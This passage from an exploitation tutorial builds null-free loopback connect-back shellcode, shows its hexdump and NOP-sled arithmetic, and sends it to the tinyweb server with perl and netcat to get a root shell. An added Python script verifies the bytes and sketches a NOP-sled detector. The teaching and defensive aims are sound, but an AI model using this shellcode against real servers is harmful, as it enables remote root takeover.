multiple instructions. One way to do this is to write the two null bytes to
the stack using a zeroed register. The file loopback_shell.s is a modified
version of connectback_shell.s that uses the loopback address of 127.0.0.1.
The differences are shown in the following output.
reader@hacking:~/booksrc $ diff connectback_shell.s loopback_shell.s
21c21,22
< push DWORD 0x482aa8c0 ; Build sockaddr struct: IP Address = 192.168.42.72
---
> push DWORD 0x01BBBB7f ; Build sockaddr struct: IP Address = 127.0.0.1
> mov WORD [esp+1], dx ; overwrite the BBBB with 0000 in the previous push
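Review bot: the second `>` line, `mov WORD [esp+1], dx`, only writes the 0000 its comment promises if DX is already zero, and neither the diff nor the comment says where EDX was cleared; the text above relies on "a zeroed register", so the comment should name that dependency, because any later edit that touches EDX before this store would silently turn the pushed address into something other than 127.0.0.1.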
reader@hacking:~/booksrc $
After pushing the value 0x01BBBB7f to the stack, the ESP register will point
to the beginning of this DWORD. By writing a two-byte WORD of null bytes
at ESP+1, the middle two bytes will be overwritten to form the correct return
address.
This additional instruction increases the size of the shellcode by a few
bytes, which means the NOP sled also needs to be adjusted for the exploit
buffer. These calculations are shown in the output below, and they result in
a 397-byte NOP sled. This exploit using the loopback shellcode assumes that
the tinyweb program is running and that a netcat process is listening for
incoming connections on port 31337.
reader@hacking:~/booksrc $ nasm loopback_shell.s
reader@hacking:~/booksrc $ hexdump -C loopback_shell | grep --color=auto 00
00000000 6a 66 58 99 31 db 43 52 6a 01 6a 02 89 e1 cd 80 |jfX.1.CRj.j.....|
00000010 96 6a 66 58 43 68 7f bb bb 01 66 89 54 24 01 66 |.jfXCh....f.T$.f|
00000020 68 7a 69 66 53 89 e1 6a 10 51 56 89 e1 43 cd 80 |hzifS..j.QV..C..|
00000030 87 f3 87 ce 49 b0 3f cd 80 49 79 f9 b0 0b 52 68 |....I.?..Iy...Rh|
00000040 2f 2f 73 68 68 2f 62 69 6e 89 e3 52 89 e2 53 89 |//shh/bin..R..S.|
00000050 e1 cd 80 |...|
00000053
reader@hacking:~/booksrc $ wc -c loopback_shell
83 loopback_shell
reader@hacking:~/booksrc $ echo $(( 544 - (4*16) - 83 ))
397
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x397';cat loopback_shell;perl -e 'print "\x88\xf6\xff\xbf"x16 . "\r\n"') | nc -v 127.0.0.1 80
localhost [127.0.0.1] 80 (www) open
As with the previous exploit, the terminal with netcat listening on
port 31337 will receive the rootshell.
reader@hacking:~ $ nc -vlp 31337
listening on [any] 31337 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 42406
whoami
root
It almost seems too easy, doesn't it?
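The following Python is an added check on the walkthrough above; it is example code written for this page, not from the book's source files. It models `push DWORD 0x01BBBB7f` followed by `mov WORD [esp+1], dx` with DX zero and shows the four bytes that result, re-parses the hexdump printed above to confirm the 83 bytes contain no NUL byte and that the encoded pair `68 7f bb bb 01` / `66 89 54 24 01` sits at offset 21, repeats the 544 - 4*16 - 83 sled arithmetic, and, from the defender's side, measures the longest run of 0x90 in a request body, which is the signal a NOP sled of this size leaves in traffic. The sample requests and the 64-byte alert threshold are constructed assumptions.

```python
import re
import struct

# Constructed copy of the `hexdump -C` output shown on the page for loopback_shell.
LOOPBACK_SHELL_HEXDUMP = """\
00000000  6a 66 58 99 31 db 43 52 6a 01 6a 02 89 e1 cd 80  |jfX.1.CRj.j.....|
00000010  96 6a 66 58 43 68 7f bb bb 01 66 89 54 24 01 66  |.jfXCh....f.T$.f|
00000020  68 7a 69 66 53 89 e1 6a 10 51 56 89 e1 43 cd 80  |hzifS..j.QV..C..|
00000030  87 f3 87 ce 49 b0 3f cd 80 49 79 f9 b0 0b 52 68  |....I.?..Iy...Rh|
00000040  2f 2f 73 68 68 2f 62 69 6e 89 e3 52 89 e2 53 89  |//shh/bin..R..S.|
00000050  e1 cd 80                                          |...|
00000053
"""

# Encoding of the two instructions from the diff: push imm32, then mov [esp+1], dx.
ENCODED_PUSH_AND_STORE = bytes.fromhex("687fbbbb01") + bytes.fromhex("6689542401")

HEX_PAIR = re.compile(r"[0-9a-f]{2}")


def parse_hexdump(text: str) -> bytes:
    """Turn `hexdump -C` output back into bytes, ignoring offsets and the ASCII gutter."""
    out = bytearray()
    for line in text.splitlines():
        body = line.split("|", 1)[0]          # drop the ASCII column before parsing
        fields = body.split()
        if len(fields) < 2:                   # offset-only trailer such as "00000053"
            continue
        for pair in fields[1:]:               # fields[0] is the offset
            if not HEX_PAIR.fullmatch(pair):
                raise ValueError(f"unexpected token in hexdump: {pair!r}")
            out.append(int(pair, 16))
    return bytes(out)


def has_null_byte(code: bytes) -> bool:
    """A NUL inside string-copied shellcode truncates it, which is why the page avoids them."""
    return b"\x00" in code


def simulate_push_then_word_store(imm32: int, dx: int = 0) -> bytes:
    """Model the stack after `push DWORD imm32` and `mov WORD [esp+1], dx` on 32-bit x86.

    push leaves the little-endian bytes of imm32 at [ESP]; the 16-bit store then
    overwrites the two bytes at ESP+1 and ESP+2 with the contents of DX.
    """
    stack = bytearray(struct.pack("<I", imm32))   # bytes at [ESP], lowest address first
    stack[1:3] = struct.pack("<H", dx)            # the two middle bytes become DX
    return bytes(stack)


def dotted_quad(addr4: bytes) -> str:
    """Render the four in_addr bytes in memory order as an IPv4 string."""
    return ".".join(str(b) for b in addr4)


def nop_sled_size(buffer_len: int, ret_copies: int, shellcode_len: int, ptr_size: int = 4) -> int:
    """The page's arithmetic: buffer minus the repeated return address minus the shellcode."""
    return buffer_len - ret_copies * ptr_size - shellcode_len


def longest_run(data: bytes, value: int = 0x90) -> int:
    """Length of the longest consecutive run of `value` (0x90 is the x86 NOP)."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best


def looks_like_nop_sled(payload: bytes, threshold: int = 64) -> bool:
    """Crude detector: a long unbroken NOP run has no business in an HTTP request."""
    return longest_run(payload) >= threshold


if __name__ == "__main__":
    code = parse_hexdump(LOOPBACK_SHELL_HEXDUMP)
    print("bytes:", len(code), "contains NUL:", has_null_byte(code))
    print("push+store found at offset:", code.find(ENCODED_PUSH_AND_STORE))
    after = simulate_push_then_word_store(0x01BBBB7F)
    print("stack after both instructions:", after.hex(" "), "=", dotted_quad(after))
    print("sled size:", nop_sled_size(544, 16, 83))
    # Constructed request bodies: one benign, one shaped like the page's exploit buffer.
    benign = b"GET / HTTP/1.0\r\nHost: localhost\r\n\r\n"
    suspicious = b"\x90" * 397 + code
    print("benign flagged:", looks_like_nop_sled(benign), "sled flagged:", looks_like_nop_sled(suspicious))
```

The store at ESP+1 is what makes the trick work: the pushed immediate 0x01BBBB7f lands in memory as `7f bb bb 01`, and the two-byte write turns it into `7f 00 00 01`, which is 127.0.0.1 in the order `in_addr` expects, without a literal zero ever appearing in the instruction stream. The detector at the end is deliberately simple; a real sensor would also look at the bytes that follow the run, but the length of the run alone already separates the constructed benign request from the exploit-shaped one.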